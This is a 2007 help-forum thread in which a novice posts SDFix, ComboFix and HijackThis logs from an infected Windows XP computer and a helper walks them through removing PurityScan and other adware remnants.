Malware infection w/ HJT and other log files attached

Hello,

I'm *very* new at this so I hope I can describe the problem well enough that folks might be able to help.

After booting my computer, my desktop wallpaper disappears momentarily, the desktop goes blank, and then everything comes back and looks "normal," except the icons have slight black borders. The computer then tries to access the I-Net. Obviously, something's up. I tried researching the Malware or Trojan Horse that it might be to no avail. I read through this thread:

http://www.windowsbbs.com/showthread.php?t=64975

And followed the steps, hoping that I might see some results. Unfortunately, the Malware still exists.

Here are the log files that were created after those steps were followed. The are in order, SDFix, ComboFix, and Hijackthis:


SDFix: Version 1.86

Run by Owner - Mon 06/04/2007 - 16:05:24.71

Microsoft Windows XP [Version 5.1.2600]

Running From: C:\SDFix

Safe Mode:
Checking Services:

Name:
Windows Overlay Components

ImagePath:
C:\WINDOWS\okmbdnr.exe

Windows Overlay Components - Deleted



Restoring Windows Registry Values
Restoring Windows Default Hosts File

Rebooting...


Normal Mode:
Checking Files:

Below files will be copied to Backups folder then removed:

C:\tm - Deleted
C:\WINDOWS\tcb.pmw - Deleted
C:\WINDOWS\wr.txt - Deleted



Removing Temp Files...

ADS Check:

Checking if ADS is attached to system32 Folder
C:\WINDOWS\system32
No streams found.

Checking if ADS is attached to svchost.exe
C:\WINDOWS\system32\svchost.exe
No streams found.

Checking if ADS is attached to ntoskrnl.exe
C:\WINDOWS\system32\ntoskrnl.exe
No streams found.



Final Check:

Remaining Services:
------------------



Authorized Application Key Export:

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\\system32\\sessmgr.exe "= "%windir%\\system32\\sessmgr.exe:*:enabledxpsp2res.dll,-22019 "
"C:\\Program Files\\ICQ\\Icq.exe "= "C:\\Program Files\\ICQ\\Icq.exe:*isabled:ICQ "
"C:\\Program Files\\Yahoo!\\Messenger\\YPager.exe "= "C:\\Program Files\\Yahoo!\\Messenger\\YPager.exe:*isabled:Yahoo! Messenger "
"C:\\Program Files\\D-Link\\D-Link DI-701\\setup.exe "= "C:\\Program Files\\D-Link\\D-Link DI-701\\setup.exe:*:Enabled:CA2000 "
"C:\\Program Files\\WS_FTP\\ws_ftp95.exe "= "C:\\Program Files\\WS_FTP\\ws_ftp95.exe:*:Enabled:WS_FTP 95 "

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\\system32\\sessmgr.exe "= "%windir%\\system32\\sessmgr.exe:*:enabledxpsp2res.dll,-22019 "

Remaining Files:
---------------

Backups Folder: - C:\SDFix\backups\backups.zip

Listing Files with Hidden Attributes:

C:\WINDOWS\system32\vtuts.dll
C:\Program Files\Common Files\Yazzle1281OinUninstaller.exe
C:\Program Files\Detto\DettoWeb.exe
C:\Program Files\Detto\IntelliMover Demo.exe
C:\WINDOWS\okmbdnrA.exe
C:\WINDOWS\rugowokA.exe

Listing User Accounts:

User accounts for \\HP-PAVILION

Administrator Guest HelpAssistant
Owner SUPPORT_388945a0 SUPPORT_fddfa904


Finished







"Owner" - 2007-06-04 16:56:14 Service Pack 2 NTFS
ComboFix 07-06-3 - Running from: "C:\Documents and Settings\All Users\Documents\ "


(((((((((((((((((((((((((((((((((((((((((((( V Log )))))))))))))))))))))))))))))))))))))))))))))))))))))))


C:\WINDOWS\system32\stutv.bak1
C:\WINDOWS\system32\stutv.ini
C:\WINDOWS\system32\stutv.bak1
C:\WINDOWS\system32\stutv.ini
C:\WINDOWS\system32\vtuts.dll
C:\WINDOWS\system32\fccawvs.dll


* * * POST RUN FILES/FOLDERS * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))


-- Purity Folders:
C:\Program Files\Common Files\Yazzle1281OinUninstaller.exe
C:\Program Files\MSN Gaming Zone\rtemehdofse.html
C:\Program Files\outerinfo
C:\Program Files\outerinfo\Terms.rtf
C:\Temp\0b9
C:\Temp\0b9\tmpTF.log
C:\WINDOWS\cfg32.exe
C:\WINDOWS\cfg32o.dll
C:\WINDOWS\cfg32r.dll
C:\WINDOWS\cfg32s.dll
C:\WINDOWS\CROSOF~1
C:\WINDOWS\rau001978.exe
C:\WINDOWS\system32\FNTS~1
C:\WINDOWS\system32\pog
C:\WINDOWS\system32\T3
C:\WINDOWS\system32\T4


((((((((((((((((((((((((((((((((((((((( Drivers/Services )))))))))))))))))))))))))))))))))))))))))))))))))

-------\nm


((((((((((((((((((((((((( Files Created from 2007-05-04 to 2007-06-04 )))))))))))))))))))))))))))))))


2007-06-04 13:31 10,872 --a------ C:\WINDOWS\system32\drivers\AvgAsCln.sys
2007-06-04 10:12 54,784 --a------ C:\WINDOWS\rugowok.exe
2007-06-04 10:12 421,920 -r-hs---- C:\WINDOWS\okmbdnrA.exe
2007-06-04 10:12 416,352 -r-hs---- C:\WINDOWS\rugowokA.exe
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\TQ0
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\T9
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\T7
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\T6
2007-06-04 10:12 <DIR> d-------- C:\Program Files\myCleanerPC
2007-06-04 10:11 <DIR> d-------- C:\WINDOWS\system32\T1QaSQ
2007-06-04 10:11 <DIR> d-------- C:\Temp\x2b
2007-06-04 10:11 <DIR> d-------- C:\Temp


(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))

2007-06-04 20:59:04 -------- d-----w C:\Program Files\MSN Gaming Zone
2007-06-04 14:51:47 -------- d-----w C:\Program Files\Lavasoft Ad-aware
2007-06-04 14:12:36 -------- d-----w C:\Program Files\Messenger
2007-05-15 17:59:06 12,622 -c--a-w C:\WINDOWS\mozver.dat
2007-04-29 15:05:46 -------- d-----w C:\DOCUME~1\Owner\APPLIC~1\MailWasher


((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))


*Note* empty entries & legit default entries are not shown

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}=C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx [2001-03-02 22:02]
{0B823EC2-EF85-4558-C6B8-0D0815A2EB49}=C:\Program Files\MSN Gaming Zone\qudasulu.dll []
{0BF40F9D-F5F6-4120-A145-31F915B46DAC}=C:\Program Files\Messenger\meroze.dll []
{5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897}=C:\Program Files\Yahoo!\Common\yiesrvc.dll [2005-05-26 11:38]
{65D886A2-7CA7-479B-BB95-14D1EFB7946A}=C:\Program Files\Yahoo!\Common\YIeTagBm.dll [2005-01-24 09:55]
{C67E4B15-A1AE-FA0E-DA07-8EADDEE127CF}=C:\WINDOWS\system32\vpqenx.dll []

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"nwiz "= "nwiz.exe" [2004-10-29 17:50 C:\WINDOWS\system32\nwiz.exe]
"CamMonitor "= "c:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe" [2002-06-18 02:11]
"KBD "= "C:\HP\KBD\KBD.EXE" [2001-07-07 00:56]
"checktime "= "c:\program files\HPSelect\Frontend\ct.exe" [2002-01-26 16:05]
"StorageGuard "= "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" [2002-05-09 11:01]
"AlcxMonitor "= "ALCXMNTR.EXE" [2004-09-07 13:47 C:\WINDOWS\ALCXMNTR.EXE]
"QuickTime Task "= "C:\Program Files\QuickTime\qttask.exe" [2005-12-05 21:33]
"RemoteControl "= "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe" [2004-11-02 21:24]
"!AVG Anti-Spyware "= "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" [2007-05-30 08:30]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Notn "= "C:\WINDOWS\CROSOF~1\fast.exe" []
"Ryv "= "C:\WINDOWS\system32\F?nts\??rss.exe" []

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\system]
"DisableRegistryTools "=0 (0x0)

[HKEY_CURRENT_USER\software\microsoft\internet explorer\desktop\components\0]
Source= C:\Program Files\MSN Gaming Zone\rtemehdofse.html
FriendlyName=

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{57B86673-276A-48B2-BAE7-C6DBB3020EB8} "= "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\shellexecutehook.dll" [2007-05-30 08:29]

HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost *netsvcs*


Contents of the 'Scheduled Tasks' folder
2007-06-04 21:12:15 C:\WINDOWS\tasks\Symantec NetDetect.job

**************************************************************************

catchme 0.3.692 W2K/XP/Vista - userland rootkit detector by Gmer, http://www.gmer.net
Rootkit scan 2007-06-04 17:12:11
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

**************************************************************************

Completion time: 2007-06-04 17:15:37 - machine was rebooted
C:\ComboFix-quarantined-files.txt ... 2007-06-04 17:15

--- E O F ---





Logfile of HijackThis v1.99.1
Scan saved at 5:22:49 PM, on 6/4/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\XiMeta\NetDisk\LDServ.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe
C:\HP\KBD\KBD.EXE
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe
C:\Program Files\XiMeta\NetDisk\Admin.exe
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\HijackThis\jakers.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://srch-us6.hpwis.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.comcast.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://srch-us6.hpwis.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://srch-us6.hpwis.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://srch-us6.hpwis.com/
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
N3 - Netscape 7: user_pref( "browser.startup.homepage ", "http://www.google.com/ "); (C:\Documents and Settings\Owner\Application Data\Mozilla\Profiles\default\1sgmifpi.slt\prefs.js)
N3 - Netscape 7: user_pref( "browser.search.defaultengine ", "engine://C%3A%5CProgram%20Files%5CNetscape%5CNetscape%5Csearchplugins%5CSBWeb_02.src "); (C:\Documents and Settings\Owner\Application Data\Mozilla\Profiles\default\1sgmifpi.slt\prefs.js)
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: 0 - {0B823EC2-EF85-4558-C6B8-0D0815A2EB49} - C:\Program Files\MSN Gaming Zone\qudasulu.dll (file missing)
O2 - BHO: (no name) - {0BF40F9D-F5F6-4120-A145-31F915B46DAC} - C:\Program Files\Messenger\meroze.dll (file missing)
O2 - BHO: UberButton Class - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: YahooTaggedBM Class - {65D886A2-7CA7-479B-BB95-14D1EFB7946A} - C:\Program Files\Yahoo!\Common\YIeTagBm.dll
O2 - BHO: (no name) - {C67E4B15-A1AE-FA0E-DA07-8EADDEE127CF} - C:\WINDOWS\system32\vpqenx.dll (file missing)
O2 - BHO: (no name) - {C68AE9C0-0909-4DDC-B661-C1AFB9F5AE53} - (no file)
O3 - Toolbar: hp toolkit - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - C:\HP\EXPLOREBAR\HPTOOLKT.DLL
O3 - Toolbar: &NetDisk Tools - {6BB8F8F1-EFD5-45A0-87BA-74A0E7AFD10B} - C:\Program Files\XiMeta\NetDisk\Drivers\NDExpTool.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [CamMonitor] c:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [checktime] c:\program files\HPSelect\Frontend\ct.exe
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [AlcxMonitor] ALCXMNTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe "
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [Notn] "C:\WINDOWS\CROSOF~1\fast.exe" -vt yazb
O4 - HKCU\..\Run: [Ryv] C:\WINDOWS\system32\F?nts\??rss.exe
O4 - Global Startup: NetDisk Administrator.lnk = C:\Program Files\XiMeta\NetDisk\Admin.exe
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: Net2Phone - {4B30061A-5B39-11D3-80F8-0090276F843F} - C:\Program Files\Net2Phone\Net2fone.exe
O9 - Extra 'Tools' menuitem: Net2Phone - {4B30061A-5B39-11D3-80F8-0090276F843F} - C:\Program Files\Net2Phone\Net2fone.exe
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O14 - IERESET.INF: START_PAGE_URL=http://www.comcast.net
O16 - DPF: {41F17733-B041-4099-A042-B518BB6A408C} - http://apple.speedera.net/qtinstall.info.apple.com/borris/us/win/QuickTimeInstaller.exe
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: NetDisk Service (NetDisk_Service) - Unknown owner - C:\Program Files\XiMeta\NetDisk\LDServ.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: OKI OPHD DCS Loader - Oki Data Corporation - C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\OPHDLDCS.EXE
O23 - Service: SNMP Trap Service (SNMPTRAP) - Unknown owner - C:\WINDOWS\system32\snmptrap.exe (file missing)


Thank you SO much in advance for any help you guys can offer.

Pat

 

Okay, I followed the HJT instructions, and those line items are gone on reboot (thank you!!), but in order for SpyHunter to delete the PurityScan files, I have to ORDER the product ($29.95), which involves sending my credit card information through a computer that is currently infected with a virus (or whatever), something I'm not comfortable doing for obvious reasons. Is there any other way of getting rid of this PurityScan infection w/o having to actually order the product on an at risk computer?

 

Do not under any circumstance purchase any software to remove anything.

Lets run another tool which will rip out PS easily. And best of all, it's free and will fix up things proper.


Download combofix.exe

• Double click combofix.exe & follow the prompts.
• When finished, it shall produce a log for you. Post that log in your next reply with a new HJT log please.

Note:
Do not mouse click combofix's window whilst it's running. That may cause it to stall.

 

I ran Combofix first and then HJT. I have not manually rebooted my computer (the black outline around the desktop icons is still present). Here are the two logs:


"Owner" - 2007-06-06 2:08:29 Service Pack 2 NTFS
ComboFix 07-06-3 - Running from: "C:\Documents and Settings\All Users\Documents\ "


((((((((((((((((((((((((( Files Created from 2007-05-06 to 2007-06-06 )))))))))))))))))))))))))))))))


2007-06-05 23:16 <DIR> d-------- C:\Program Files\Enigma Software Group
2007-06-04 17:15 49,152 --a------ C:\WINDOWS\nircmd.exe
2007-06-04 13:31 10,872 --a------ C:\WINDOWS\system32\drivers\AvgAsCln.sys
2007-06-04 10:12 54,784 --a------ C:\WINDOWS\rugowok.exe
2007-06-04 10:12 421,920 -r-hs---- C:\WINDOWS\okmbdnrA.exe
2007-06-04 10:12 416,352 -r-hs---- C:\WINDOWS\rugowokA.exe
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\TQ0
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\T9
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\T7
2007-06-04 10:12 <DIR> d-------- C:\WINDOWS\system32\T6
2007-06-04 10:12 <DIR> d-------- C:\Program Files\myCleanerPC
2007-06-04 10:11 <DIR> d-------- C:\WINDOWS\system32\T1QaSQ
2007-06-04 10:11 <DIR> d-------- C:\Temp\x2b
2007-06-04 10:11 <DIR> d-------- C:\Temp


(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))

2007-06-04 20:59:04 -------- d-----w C:\Program Files\MSN Gaming Zone
2007-06-04 14:51:47 -------- d-----w C:\Program Files\Lavasoft Ad-aware
2007-06-04 14:12:36 -------- d-----w C:\Program Files\Messenger
2007-05-15 17:59:06 12,622 -c--a-w C:\WINDOWS\mozver.dat
2007-04-29 15:05:46 -------- d-----w C:\DOCUME~1\Owner\APPLIC~1\MailWasher
2007-03-15 16:23:16 497,496 ----a-w C:\WINDOWS\system32\XceedZip.dll
2007-03-15 16:19:58 526,184 ----a-w C:\WINDOWS\system32\XceedCry.dll


((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))


*Note* empty entries & legit default entries are not shown

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}=C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx [2001-03-02 22:02]
{5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897}=C:\Program Files\Yahoo!\Common\yiesrvc.dll [2005-05-26 11:38]
{65D886A2-7CA7-479B-BB95-14D1EFB7946A}=C:\Program Files\Yahoo!\Common\YIeTagBm.dll [2005-01-24 09:55]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"nwiz "= "nwiz.exe" [2004-10-29 17:50 C:\WINDOWS\system32\nwiz.exe]
"CamMonitor "= "c:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe" [2002-06-18 02:11]
"KBD "= "C:\HP\KBD\KBD.EXE" [2001-07-07 00:56]
"checktime "= "c:\program files\HPSelect\Frontend\ct.exe" [2002-01-26 16:05]
"StorageGuard "= "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" [2002-05-09 11:01]
"AlcxMonitor "= "ALCXMNTR.EXE" [2004-09-07 13:47 C:\WINDOWS\ALCXMNTR.EXE]
"QuickTime Task "= "C:\Program Files\QuickTime\qttask.exe" [2005-12-05 21:33]
"RemoteControl "= "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe" [2004-11-02 21:24]
"!AVG Anti-Spyware "= "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" [2007-05-30 08:30]
"SpyHunter "= "C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter.exe" [2007-04-26 19:03]

[HKEY_CURRENT_USER\software\microsoft\internet explorer\desktop\components\0]
Source= C:\Program Files\MSN Gaming Zone\rtemehdofse.html
FriendlyName=

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{57B86673-276A-48B2-BAE7-C6DBB3020EB8} "= "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\shellexecutehook.dll" [2007-05-30 08:29]

HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost *netsvcs*


Contents of the 'Scheduled Tasks' folder
2007-06-06 03:36:47 C:\WINDOWS\tasks\Symantec NetDetect.job

**************************************************************************

catchme 0.3.692 W2K/XP/Vista - userland rootkit detector by Gmer, http://www.gmer.net
Rootkit scan 2007-06-06 02:11:19
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

**************************************************************************

Completion time: 2007-06-06 2:12:36
C:\ComboFix-quarantined-files.txt ... 2007-06-06 02:12
C:\ComboFix2.txt ... 2007-06-04 20:40
C:\ComboFix3.txt ... 2007-06-04 20:35

--- E O F ---



Logfile of HijackThis v1.99.1
Scan saved at 2:15:00 AM, on 6/6/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\XiMeta\NetDisk\LDServ.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe
C:\HP\KBD\KBD.EXE
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe
C:\Program Files\XiMeta\NetDisk\Admin.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\explorer.exe
C:\Program Files\HijackThis\jakers.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://srch-us6.hpwis.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.comcast.net
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://srch-us6.hpwis.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://srch-us6.hpwis.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://srch-us6.hpwis.com/
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost
N3 - Netscape 7: user_pref( "browser.startup.homepage ", "http://www.google.com/ "); (C:\Documents and Settings\Owner\Application Data\Mozilla\Profiles\default\1sgmifpi.slt\prefs.js)
N3 - Netscape 7: user_pref( "browser.search.defaultengine ", "engine://C%3A%5CProgram%20Files%5CNetscape%5CNetscape%5Csearchplugins%5CSBWeb_02.src "); (C:\Documents and Settings\Owner\Application Data\Mozilla\Profiles\default\1sgmifpi.slt\prefs.js)
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: UberButton Class - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: YahooTaggedBM Class - {65D886A2-7CA7-479B-BB95-14D1EFB7946A} - C:\Program Files\Yahoo!\Common\YIeTagBm.dll
O2 - BHO: (no name) - {C68AE9C0-0909-4DDC-B661-C1AFB9F5AE53} - (no file)
O3 - Toolbar: hp toolkit - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - C:\HP\EXPLOREBAR\HPTOOLKT.DLL
O3 - Toolbar: &NetDisk Tools - {6BB8F8F1-EFD5-45A0-87BA-74A0E7AFD10B} - C:\Program Files\XiMeta\NetDisk\Drivers\NDExpTool.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [CamMonitor] c:\Program Files\Hewlett-Packard\Digital Imaging\Unload\hpqcmon.exe
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [checktime] c:\program files\HPSelect\Frontend\ct.exe
O4 - HKLM\..\Run: [StorageGuard] "C:\Program Files\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [AlcxMonitor] ALCXMNTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe "
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKLM\..\Run: [SpyHunter] C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter.exe
O4 - Global Startup: NetDisk Administrator.lnk = C:\Program Files\XiMeta\NetDisk\Admin.exe
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: Net2Phone - {4B30061A-5B39-11D3-80F8-0090276F843F} - C:\Program Files\Net2Phone\Net2fone.exe
O9 - Extra 'Tools' menuitem: Net2Phone - {4B30061A-5B39-11D3-80F8-0090276F843F} - C:\Program Files\Net2Phone\Net2fone.exe
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O14 - IERESET.INF: START_PAGE_URL=http://www.comcast.net
O16 - DPF: {41F17733-B041-4099-A042-B518BB6A408C} - http://apple.speedera.net/qtinstall.info.apple.com/borris/us/win/QuickTimeInstaller.exe
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O23 - Service: AVG Anti-Spyware Guard - GRISOFT s.r.o. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: NetDisk Service (NetDisk_Service) - Unknown owner - C:\Program Files\XiMeta\NetDisk\LDServ.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
